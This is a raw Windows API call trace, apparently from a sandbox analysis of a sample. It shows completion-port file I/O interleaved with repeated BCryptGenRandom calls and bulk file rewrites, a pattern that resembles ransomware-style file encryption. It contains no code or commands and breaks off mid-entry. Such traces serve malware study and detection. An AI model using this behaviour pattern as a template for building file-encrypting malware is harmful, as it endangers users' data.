GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.002] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.002] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.002] free (_Block=0x77d800) [0077.002] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.002] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.002] free (_Block=0x1ff1930) [0077.002] free (_Block=0x1ff1a40) [0077.002] free (_Block=0x77d908) [0077.002] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.008] CloseHandle (hObject=0x3b4) returned 1 [0077.008] free (_Block=0x3d70048) [0077.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.011] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0077.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.060] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0077.060] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.066] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xcd6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.067] CloseHandle (hObject=0x3b4) returned 1 [0077.067] free (_Block=0x1ff1e60) [0077.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.122] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.122] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.122] free (_Block=0x77d800) [0077.122] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.122] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.122] free (_Block=0x1ff1930) [0077.122] free (_Block=0x1ff1a40) [0077.122] free (_Block=0x77d908) [0077.122] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.135] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.135] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.135] free (_Block=0x77d800) [0077.135] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.135] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.135] free (_Block=0x1ff1930) [0077.135] free (_Block=0x1ff1a40) [0077.135] free (_Block=0x77d908) [0077.135] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.148] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.148] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.148] free (_Block=0x77d800) [0077.148] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.148] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.148] free (_Block=0x1ff1930) [0077.148] free (_Block=0x1ff1a40) [0077.148] free (_Block=0x77d908) [0077.148] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.152] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.157] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.157] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.157] free (_Block=0x77d800) [0077.157] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0077.157] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0077.157] free (_Block=0x3db00b8) [0077.157] free (_Block=0x3db01c8) [0077.157] free (_Block=0x77d908) [0077.157] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.160] CloseHandle (hObject=0x3a0) returned 1 [0077.160] free (_Block=0x1ff1e60) [0077.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.648] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x303d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.671] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.671] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.671] free (_Block=0x77d800) [0077.671] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0077.671] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0077.671] free (_Block=0x1ff1930) [0077.671] free (_Block=0x1ff1a40) [0077.671] free (_Block=0x77d908) [0077.671] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0077.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.685] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0077.688] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.688] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.688] free (_Block=0x77d800) [0077.688] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0077.688] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0077.688] free (_Block=0x3db00b8) [0077.688] free (_Block=0x3db01c8) [0077.688] free (_Block=0x77d908) [0077.688] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.691] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.695] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.721] ReadFile (in: hFile=0x3bc, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x2279e, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0077.724] CloseHandle (hObject=0x3bc) returned 1 [0077.727] free (_Block=0x2031ed0) [0077.730] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.105] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.105] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.105] free (_Block=0x1ff1e60) [0079.105] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.105] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.106] free (_Block=0x1ff1e60) [0079.106] free (_Block=0x1ff1930) [0079.106] free (_Block=0x77d800) [0079.106] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.122] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.122] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.122] free (_Block=0x77d800) [0079.122] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.122] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.122] free (_Block=0x1ff1930) [0079.122] free (_Block=0x1ff1a40) [0079.122] free (_Block=0x77d908) [0079.122] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.137] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x26620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.160] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2279e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0079.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.205] ReadFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x2666c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0079.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.226] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.226] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.226] free (_Block=0x77d800) [0079.226] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.226] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.226] free (_Block=0x1ff1930) [0079.226] free (_Block=0x1ff1a40) [0079.227] free (_Block=0x77d908) [0079.227] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0079.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0079.256] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.256] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.256] free (_Block=0x77d800) [0079.256] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.256] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.256] free (_Block=0x1ff1930) [0079.256] free (_Block=0x1ff1a40) [0079.256] free (_Block=0x77d908) [0079.256] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.261] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0079.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.263] CloseHandle (hObject=0x3a0) returned 1 [0079.263] free (_Block=0x3d70048) [0079.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0079.602] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, 